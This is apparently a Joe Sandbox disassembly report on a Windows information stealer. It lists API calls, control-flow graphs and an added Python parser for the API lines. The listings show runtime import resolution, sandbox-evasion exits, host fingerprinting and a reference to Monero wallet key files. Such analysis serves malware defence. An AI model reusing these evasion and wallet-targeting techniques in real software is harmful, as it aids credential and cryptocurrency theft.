                                • GetProcAddress.KERNEL32(77040000,019FD500), ref: 00C4A123
                                • GetProcAddress.KERNEL32(77040000,019E5208), ref: 00C4A13B
                                • GetProcAddress.KERNEL32(73D20000,019EA528), ref: 00C4A160
                                • GetProcAddress.KERNEL32(73D20000,019E54C8), ref: 00C4A179
                                • GetProcAddress.KERNEL32(73D20000,019EA898), ref: 00C4A191
                                • GetProcAddress.KERNEL32(73D20000,019FD578), ref: 00C4A1A9
                                • GetProcAddress.KERNEL32(73D20000,019FD4B8), ref: 00C4A1C2
                                • GetProcAddress.KERNEL32(73D20000,019E5568), ref: 00C4A1DA
                                • GetProcAddress.KERNEL32(73D20000,019E53A8), ref: 00C4A1F2
                                • GetProcAddress.KERNEL32(73D20000,019FD4D0), ref: 00C4A20B
                                • GetProcAddress.KERNEL32(768D0000,019E5728), ref: 00C4A22C
                                • GetProcAddress.KERNEL32(768D0000,019E5388), ref: 00C4A244
                                • GetProcAddress.KERNEL32(768D0000,019FD3B0), ref: 00C4A25D
                                • GetProcAddress.KERNEL32(768D0000,019FD3C8), ref: 00C4A275
                                • GetProcAddress.KERNEL32(768D0000,019E54A8), ref: 00C4A28D
                                • GetProcAddress.KERNEL32(75790000,019EA550), ref: 00C4A2B3
                                • GetProcAddress.KERNEL32(75790000,019EA780), ref: 00C4A2CB
                                • GetProcAddress.KERNEL32(75790000,019FD338), ref: 00C4A2E3
                                • GetProcAddress.KERNEL32(75790000,019E55E8), ref: 00C4A2FC
                                • GetProcAddress.KERNEL32(75790000,019E5648), ref: 00C4A314
                                • GetProcAddress.KERNEL32(75790000,019EA5A0), ref: 00C4A32C
                                • GetProcAddress.KERNEL32(75A10000,019FD428), ref: 00C4A352
                                • GetProcAddress.KERNEL32(75A10000,019E5708), ref: 00C4A36A
                                • GetProcAddress.KERNEL32(75A10000,019F8B58), ref: 00C4A382
                                • GetProcAddress.KERNEL32(75A10000,019FD440), ref: 00C4A39B
                                • GetProcAddress.KERNEL32(75A10000,019FD368), ref: 00C4A3B3
                                • GetProcAddress.KERNEL32(75A10000,019E53C8), ref: 00C4A3CB
                                • GetProcAddress.KERNEL32(75A10000,019E53E8), ref: 00C4A3E4
                                • GetProcAddress.KERNEL32(75A10000,019FD518), ref: 00C4A3FC
                                • GetProcAddress.KERNEL32(75A10000,019FD398), ref: 00C4A414
                                • GetProcAddress.KERNEL32(76850000,019E5488), ref: 00C4A436
                                • GetProcAddress.KERNEL32(76850000,019FD5A8), ref: 00C4A44E
                                • GetProcAddress.KERNEL32(76850000,019FD5F0), ref: 00C4A466
                                • GetProcAddress.KERNEL32(76850000,019FD3F8), ref: 00C4A47F
                                • GetProcAddress.KERNEL32(76850000,019FD620), ref: 00C4A497
                                • GetProcAddress.KERNEL32(75690000,019E5668), ref: 00C4A4B8
                                • GetProcAddress.KERNEL32(75690000,019E5628), ref: 00C4A4D1
                                • GetProcAddress.KERNEL32(769C0000,019E5408), ref: 00C4A4F2
                                • GetProcAddress.KERNEL32(769C0000,019FD5C0), ref: 00C4A50A
                                • GetProcAddress.KERNEL32(6F8C0000,019E5428), ref: 00C4A530
                                • GetProcAddress.KERNEL32(6F8C0000,019E54E8), ref: 00C4A548
                                • GetProcAddress.KERNEL32(6F8C0000,019E56C8), ref: 00C4A560
                                • GetProcAddress.KERNEL32(6F8C0000,019FD410), ref: 00C4A579
                                • GetProcAddress.KERNEL32(6F8C0000,019E5448), ref: 00C4A591
                                • GetProcAddress.KERNEL32(6F8C0000,019E5468), ref: 00C4A5A9
                                • GetProcAddress.KERNEL32(6F8C0000,019E5508), ref: 00C4A5C2
                                • GetProcAddress.KERNEL32(6F8C0000,019E5688), ref: 00C4A5DA
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00C4A5F1
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00C4A607
                                • GetProcAddress.KERNEL32(75D90000,019FD4E8), ref: 00C4A629
                                • GetProcAddress.KERNEL32(75D90000,019F8C48), ref: 00C4A641
                                • GetProcAddress.KERNEL32(75D90000,019FD350), ref: 00C4A659
                                • GetProcAddress.KERNEL32(75D90000,019FD380), ref: 00C4A672
                                • GetProcAddress.KERNEL32(76470000,019E5528), ref: 00C4A693
                                • GetProcAddress.KERNEL32(70210000,019FD470), ref: 00C4A6B4
                                • GetProcAddress.KERNEL32(70210000,019E56A8), ref: 00C4A6CD
                                • GetProcAddress.KERNEL32(70210000,019FD5D8), ref: 00C4A6E5
                                • GetProcAddress.KERNEL32(70210000,019FD4A0), ref: 00C4A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: c3bd9a9a67b15c39f075053cc835c43c0d28ec1fd49f2dcc80478b9d0b3aca6e
                                • Instruction ID: 191d0d4bae6f16a54aede8f015aa2c696e7153d6488983568b3224a9246f26f6
                                • Opcode Fuzzy Hash: c3bd9a9a67b15c39f075053cc835c43c0d28ec1fd49f2dcc80478b9d0b3aca6e
                                • Instruction Fuzzy Hash: 5E624AB5504201AFD348DFAAED8995E37F9F7C820171C853AE61DE3224D63998C9DB13

                                 Control-flow Graph
                                 (text export of the graph image; the executed / not-executed block colouring is not recoverable from the text. Each entry is: node, address range, calls in the block, successor nodes)

                                 • 858 c45510-c45577 call c45ad0, call c4a820 * 3, call c4a740 * 4 → 874
                                 • 874 c4557c-c45583 → 875, 876
                                 • 875 c45585-c455b6 call c4a820, call c4a7a0, call c31590, call c451f0 → 892
                                 • 876 c455d7-c4564c call c4a740 * 2, call c31590, call c452c0, call c4a8a0, call c4a800, call c4aad0, StrCmpCA → 902, 905
                                 • 892 c455bb-c455d2 call c4a8a0, call c4a800 → 902
                                 • 902 c45693-c456a9 call c4aad0, StrCmpCA → 907, 908
                                 • 905 c4564e-c4568e call c4a7a0, call c31590, call c451f0, call c4a8a0, call c4a800 → 902
                                 • 907 c457dc-c45844 call c4a8a0, call c4a820 * 2, call c31670, call c4a800 * 4, call c46560, call c31550 → 1039
                                 • 908 c456af-c456b6 → 910, 911
                                 • 910 c456bc-c456c3 → 914, 915
                                 • 911 c457da-c4585f call c4aad0, StrCmpCA → 929, 930
                                 • 914 c456c5-c45719 call c4a820, call c4a7a0, call c31590, call c451f0, call c4a8a0, call c4a800 → 911
                                 • 915 c4571e-c45793 call c4a740 * 2, call c31590, call c452c0, call c4a8a0, call c4a800, call c4aad0, StrCmpCA → 911, 1018
                                 • 929 c45865-c4586c → 935, 936
                                 • 930 c45991-c459f9 call c4a8a0, call c4a820 * 2, call c31670, call c4a800 * 4, call c46560, call c31550 → 1039
                                 • 935 c45872-c45879 → 943, 944
                                 • 936 c4598f-c45a14 call c4aad0, StrCmpCA → 965, 966
                                 • 943 c458d3-c45948 call c4a740 * 2, call c31590, call c452c0, call c4a8a0, call c4a800, call c4aad0, StrCmpCA → 936, 1044
                                 • 944 c4587b-c458ce call c4a820, call c4a7a0, call c31590, call c451f0, call c4a8a0, call c4a800 → 936
                                 • 965 c45a16-c45a21 Sleep → 874
                                 • 966 c45a28-c45a91 call c4a8a0, call c4a820 * 2, call c31670, call c4a800 * 4, call c46560, call c31550 → 1039
                                 • 1018 c45795-c457d5 call c4a7a0, call c31590, call c451f0, call c4a8a0, call c4a800 → 911
                                 • 1039 c45ac3-c45ac6
                                 • 1044 c4594a-c4598a call c4a7a0, call c31590, call c451f0, call c4a8a0, call c4a800 → 936
                                APIs
                                  • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?,?,00C34F05,00C50DDE), ref: 00C4A82B
                                  • Part of subcall function 00C4A820: lstrcpy.KERNEL32(00C50DDE,00000000), ref: 00C4A885
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C456A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45857
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45228
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45318
                                  • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C4532F
                                  • Part of subcall function 00C452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C45364
                                  • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C45383
                                  • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C453AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C4578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45A0C
                                 • Sleep.KERNEL32(0000EA60), ref: 00C45A1B (0xEA60 = 60000 ms, i.e. a 60-second delay before control returns to block 874)
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 28ca5fe1dee37807d923bde4d3d99bcd04d412a287ff74fd70a68797628a0f84
                                • Instruction ID: c8a9da924e0a793bb80128a22b504f5d64081eca1e2fb0f7bf29fddeea04b1d2
                                • Opcode Fuzzy Hash: 28ca5fe1dee37807d923bde4d3d99bcd04d412a287ff74fd70a68797628a0f84
                                • Instruction Fuzzy Hash: B2E120729501049BEB14FBB1DC96AED7378FF94300F548128B906A61D2EF346B4DEB92

                                 Control-flow Graph
                                 (text export of the graph image; the executed / not-executed block colouring is not recoverable from the text. Each entry is: node, address range, calls in the block, successor nodes)

                                 • 1069 c417a0-c417cd call c4aad0, StrCmpCA → 1072, 1073
                                 • 1072 c417d7-c417f1 call c4aad0 → 1077
                                 • 1073 c417cf-c417d1 ExitProcess
                                 • 1077 c417f4-c417f8 → 1078, 1079
                                 • 1078 c419c2-c419cd call c4a800
                                 • 1079 c417fe-c41811 → 1080, 1081
                                 • 1080 c41817-c4181a → 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095
                                 • 1081 c4199e-c419bd → 1077
                                 • 1083 c41821-c41830 call c4a820 → 1081
                                 • 1084 c418ad-c418be StrCmpCA → 1097, 1098
                                 • 1085 c418cf-c418e0 StrCmpCA → 1099, 1100
                                 • 1086 c4198f-c41999 call c4a820 → 1081
                                 • 1087 c41849-c41858 call c4a820 → 1081
                                 • 1088 c41835-c41844 call c4a820 → 1081
                                 • 1089 c41970-c41981 StrCmpCA → 1110, 1111
                                 • 1090 c418f1-c41902 StrCmpCA → 1101, 1102
                                 • 1091 c41951-c41962 StrCmpCA → 1107, 1108
                                 • 1092 c41932-c41943 StrCmpCA → 1105, 1106
                                 • 1093 c41913-c41924 StrCmpCA → 1103, 1104
                                 • 1094 c4185d-c4186e StrCmpCA → 1116, 1117
                                 • 1095 c4187f-c41890 StrCmpCA → 1118, 1119
                                 • 1097 c418c0-c418c3 → 1098
                                 • 1098 c418ca → 1081
                                 • 1099 c418e2-c418e5 → 1100
                                 • 1100 c418ec → 1081
                                 • 1101 c41904-c41907 → 1102
                                 • 1102 c4190e → 1081
                                 • 1103 c41926-c41929 → 1104
                                 • 1104 c41930 → 1081
                                 • 1105 c41945-c41948 → 1106
                                 • 1106 c4194f → 1081
                                 • 1107 c41964-c41967 → 1108
                                 • 1108 c4196e → 1081
                                 • 1110 c41983-c41986 → 1111
                                 • 1111 c4198d → 1081
                                 • 1116 c41870-c41873 → 1117
                                 • 1117 c4187a → 1081
                                 • 1118 c41892-c4189c → 1120
                                 • 1119 c4189e-c418a1 → 1120
                                 • 1120 c418a8 → 1081
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00C417C5
                                • ExitProcess.KERNEL32 ref: 00C417D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: d13e92a9da1a152f91134d159d41adcb7278a955d9908e3770b230de7f83cf42
                                • Instruction ID: f0e61746c013d561aba712d3598ef19affe22111b6b03be13f0210898e39f3e1
                                • Opcode Fuzzy Hash: d13e92a9da1a152f91134d159d41adcb7278a955d9908e3770b230de7f83cf42
                                • Instruction Fuzzy Hash: 8C517DB4B1020AEFDB04DFA1D958ABE77B5BF54304F188058E856A7340D770EA85DB62
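                                 The three API listings above (the GetProcAddress/LoadLibraryA resolver, the StrCmpCA/Sleep retry loop and the function whose StrCmpCA against "block" leads to ExitProcess) all use the same Joe Sandbox line shape: `API.MODULE(args), ref: ADDR`, sometimes prefixed with `Part of subcall function XXXXXXXX:` and sometimes with no argument list at all. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the analysed sample. It parses that shape, separates the function's own calls from calls attributed to subcalls, groups GetProcAddress by module handle, records which import names the sandbox recovered in the clear versus as raw pointers, collects plaintext string arguments, and converts Sleep arguments to milliseconds. Its one assumption is that an argument of exactly eight hex digits is an address, handle or integer, `?` is unknown, and anything else is a string the sandbox resolved; the sample lines are copied from the listings above.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing into a summary.

Added example for this page, not Joe Sandbox code. Handles the line shapes
visible in the report:
    • GetProcAddress.KERNEL32(77190000,019E5308), ref: 00C49C2D
    • ExitProcess.KERNEL32 ref: 00C417D1
    • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?), ref: 00C4A82B
Assumption: an argument of exactly eight hex digits is an address, handle or
integer; '?' is unknown; anything else is a string the sandbox resolved.
"""
import re
from collections import Counter

API_LINE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"      # argument list is optional (ExitProcess, wsprintfA)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed sample: lines copied verbatim from the listings on this page.
SAMPLE_LINES = [
    "• GetProcAddress.KERNEL32(77190000,019E5308), ref: 00C49C2D",
    "• GetProcAddress.KERNEL32(77190000,019E5268), ref: 00C49C45",
    "• LoadLibraryA.KERNEL32(019FD1D0,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A03D",
    "• GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00C4A5F1",
    "• GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00C4A607",
    "  • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?,?,00C34F05,00C50DDE), ref: 00C4A82B",
    "• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45644",
    "• Sleep.KERNEL32(0000EA60), ref: 00C45A1B",
    "• StrCmpCA.SHLWAPI(00000000,block), ref: 00C417C5",
    "• ExitProcess.KERNEL32 ref: 00C417D1",
]


def parse_api_line(line):
    """Return a dict for one API line, or None if the line is not an API line."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw_args = m.group("args")
    args = [] if raw_args is None else [a.strip() for a in raw_args.split(",")]
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": args,
        "ref": int(m.group("ref"), 16),   # call-site address
        "subcall": m.group("sub"),        # None for the function's own calls
    }


def classify_arg(arg):
    """'unknown' for '?', 'hex' for an 8-digit value, 'string' for anything else.
    A resolved string that happens to be eight hex characters would be
    misclassified as 'hex'; none of the strings on this page are."""
    if arg == "?":
        return "unknown"
    if HEX8.match(arg):
        return "hex"
    return "string"


def summarize(lines):
    """Aggregate a list of API lines into counters an analyst can act on."""
    summary = {
        "direct": Counter(),              # the function's own calls, by API name
        "subcall": Counter(),             # calls attributed to subcalls
        "resolved_by_module": Counter(),  # GetProcAddress count per module handle
        "import_name_kinds": Counter(),   # GetProcAddress name arg: hex pointer vs clear string
        "plaintext_strings": set(),       # every string argument the sandbox recovered
        "sleep_ms": [],                   # Sleep() durations in milliseconds
        "unparsed": [],                   # non-empty lines that did not match
    }
    for line in lines:
        rec = parse_api_line(line)
        if rec is None:
            if line.strip():
                summary["unparsed"].append(line)
            continue
        summary["subcall" if rec["subcall"] else "direct"][rec["api"]] += 1
        if rec["api"] == "GetProcAddress" and len(rec["args"]) >= 2:
            summary["resolved_by_module"][rec["args"][0].upper()] += 1
            summary["import_name_kinds"][classify_arg(rec["args"][1])] += 1
        for arg in rec["args"]:
            if classify_arg(arg) == "string":
                summary["plaintext_strings"].add(arg)
        if rec["api"] == "Sleep" and rec["args"] and classify_arg(rec["args"][0]) == "hex":
            summary["sleep_ms"].append(int(rec["args"][0], 16))
    return summary


if __name__ == "__main__":
    s = summarize(SAMPLE_LINES)
    for key in ("direct", "subcall", "resolved_by_module", "import_name_kinds"):
        print(key, dict(s[key]))
    print("plaintext_strings", sorted(s["plaintext_strings"]))
    print("sleep_ms", s["sleep_ms"])
```

                                 Fed the full resolver listing above, `resolved_by_module` gives the per-handle counts that the control-flow graph also shows (43 for handle 77190000, 10 for 6F8C0000, and so on), and `import_name_kinds` makes the point that only two of the resolved names (InternetSetOptionA, HttpQueryInfoA) reached GetProcAddress as readable strings; the rest were passed as pointers into a buffer outside the image, which is what one expects when import names are decrypted at run time.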

                                 Control-flow Graph
                                 (text export of the graph image; the executed / not-executed block colouring is not recoverable from the text. Each entry is: node, address range, calls in the block, successor nodes)

                                 • 1124 c47500-c4754a GetWindowsDirectoryA → 1125, 1126
                                 • 1125 c47553-c475c7 GetVolumeInformationA, call c48d00 * 3 → 1133
                                 • 1126 c4754c → 1125
                                 • 1133 c475d8-c475df → 1134, 1135
                                 • 1134 c475e1-c475fa call c48d00 → 1133
                                 • 1135 c475fc-c47617 GetProcessHeap, RtlAllocateHeap → 1137, 1138
                                 • 1137 c47628-c47658 wsprintfA, call c4a740 → 1145
                                 • 1138 c47619-c47626 call c4a740 → 1145
                                 • 1145 c4767e-c4768e
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C47542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C4760A
                                • wsprintfA.USER32 ref: 00C47640
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: fd550e18fbedb16aeaef8178e618a040a0714ffa9945cd195727e52e6d8ae253
                                • Instruction ID: 8864a380c80d597f0689d3954f7338c9ce638ba41ffa57624df576df4a0c8196
                                • Opcode Fuzzy Hash: fd550e18fbedb16aeaef8178e618a040a0714ffa9945cd195727e52e6d8ae253
                                • Instruction Fuzzy Hash: A64181B1D04248AFDB10DF94DC45BEEBBB8BF48704F144199F50977280D7786A88CBA5

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1750), ref: 00C498A1
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1768), ref: 00C498BA
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1600), ref: 00C498D2
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1780), ref: 00C498EA
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F15A0), ref: 00C49903
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F8AB8), ref: 00C4991B
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019E52E8), ref: 00C49933
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019E5228), ref: 00C4994C
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F15E8), ref: 00C49964
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F17C8), ref: 00C4997C
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1630), ref: 00C49995
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1660), ref: 00C499AD
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019E5368), ref: 00C499C5
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1690), ref: 00C499DE
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C311D0: ExitProcess.KERNEL32 ref: 00C31211
                                  • Part of subcall function 00C31160: GetSystemInfo.KERNEL32(?), ref: 00C3116A
                                  • Part of subcall function 00C31160: ExitProcess.KERNEL32 ref: 00C3117E
                                  • Part of subcall function 00C31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C3112B
                                  • Part of subcall function 00C31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C31132
                                  • Part of subcall function 00C31110: ExitProcess.KERNEL32 ref: 00C31143
                                  • Part of subcall function 00C31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C3123E
                                  • Part of subcall function 00C31220: __aulldiv.LIBCMT ref: 00C31258
                                  • Part of subcall function 00C31220: __aulldiv.LIBCMT ref: 00C31266
                                  • Part of subcall function 00C31220: ExitProcess.KERNEL32 ref: 00C31294
                                  • Part of subcall function 00C46770: GetUserDefaultLangID.KERNEL32 ref: 00C46774
                                  • Part of subcall function 00C31190: ExitProcess.KERNEL32 ref: 00C311C6
                                  • Part of subcall function 00C47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                  • Part of subcall function 00C47850: RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                  • Part of subcall function 00C47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                  • Part of subcall function 00C478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                  • Part of subcall function 00C478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                  • Part of subcall function 00C478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019F8C78,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46ACA
